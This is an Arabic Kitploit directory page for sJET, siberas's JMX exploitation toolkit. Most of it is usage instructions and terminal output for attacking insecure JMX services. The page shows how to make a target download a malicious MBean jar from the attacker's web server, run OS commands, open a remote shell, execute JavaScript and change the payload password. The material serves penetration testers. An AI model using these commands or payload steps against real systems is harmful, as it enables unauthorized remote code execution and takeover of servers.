Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
sjet — siberas مجموعة أدوات استغلال JMX | Kitploit
أدوات/GitHubGitHub/siberas/sjet
توليد الحمولةالاستغلالالقيادة والسيطرةأداة الوصول عن بعد
GitHubsiberas/sjet

sjet

siberas مجموعة أدوات استغلال JMX

عرض المستودع
13391منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

sJET بواسطة siberas

مجموعة أدوات استغلال JMX من siberas

تتيح sJET استغلالًا سهلاً لخدمات JMX غير الآمنة المُهيأة. يمكن العثور على معلومات خلفية إضافية هنا وهنا.

المتطلبات الأساسية

  • Jython 2.7

الاستخدام

تنفذ sJET واجهة سطر أوامر (باستخدام argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

حيث

  • targetHost - عنوان IP الهدف
  • targerPort - منفذ الهدف الذي يعمل عليه JMX
  • password - كلمة المرور التي تم تعيينها أثناء التثبيت
  • MODE - وضع السكربت
  • modeOptions - خيارات الوضع المحدد

الأوضاع وخياراتها

  • install - تثبت الحمولة (payload) في الهدف الحالي
    • payload_url - الرابط الكامل لتحميل الحمولة
    • payload_port - منفذ تحميل الحمولة
  • uninstall - تلغي تثبيت الحمولة من الهدف الحالي
  • password - تغير كلمة المرور على حمولة منشورة بالفعل
    • password - كلمة المرور الجديدة
  • command - تشغل الأمر CMD في الهدف
    • CMD - الأمر المراد تشغيله
  • shell - تبدأ شل بسيطة في الهدف (مع قيود java's Runtime.exec())
  • javascript - تشغل ملف جافاسكريبت FILENAME في الهدف
    • FILENAME - ملف الجافاسكريبت المراد تشغيله

مثال

تثبيت MBean الحمولة على خدمة JMX قابلة للاستغلال

في المثال التالي، تعمل خدمة JMX القابلة للاستغلال على 192.168.11.136:9991، ولدى المهاجم عنوان IP 192.168.11.132. ستتصل خدمة JMX بخدمة الويب للمهاجم لتنزيل ملف الحمولة jar. ستبدأ sJET خدمة الويب اللازمة على المنفذ 8000.

بعد التثبيت الناجح لـ MBean، يتم تغيير كلمة المرور الافتراضية إلى كلمة المرور التي تم تقديمها في سطر الأوامر ("super_secret").

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

تشغيل الأمر 'ls -la' على هدف لينكس:

بعد تثبيت الحمولة، يمكننا استخدامها لتنفيذ أوامر نظام التشغيل على الهدف.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

تشغيل ping في وضع الشل على هدف

إذا كنت لا تريد تحميل Java لكل أمر، يمكنك استخدام 'وضع الشل' للحصول على شل أوامر محدودة.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

استدعاء حمولة جافاسكريبت على هدف:

السكربت المثالي 'javaproperties.js' يعرض خصائص Java للخدمة القابلة للاستغلال. يمكن استدعاؤه كالتالي:

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

تغيير كلمة المرور

تغيير كلمة المرور الحالية ('super_secret') إلى 'this-is-the-new-password':

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

إلغاء تثبيت MBean الحمولة من الهدف

إلغاء تثبيت الحمولة 'Siberas' من الهدف:

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

المساهمة

لا تتردد في المساهمة.

المؤلفون

  • Hans-Martin Münch - الفكرة الأولية والعمل - h0ng10
  • Patricio Reller - واجهة سطر الأوامر والخيارات الإضافية - preller

انظر أيضًا قائمة المساهمين الذين شاركوا في هذا المشروع.

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

تنزيل الأداة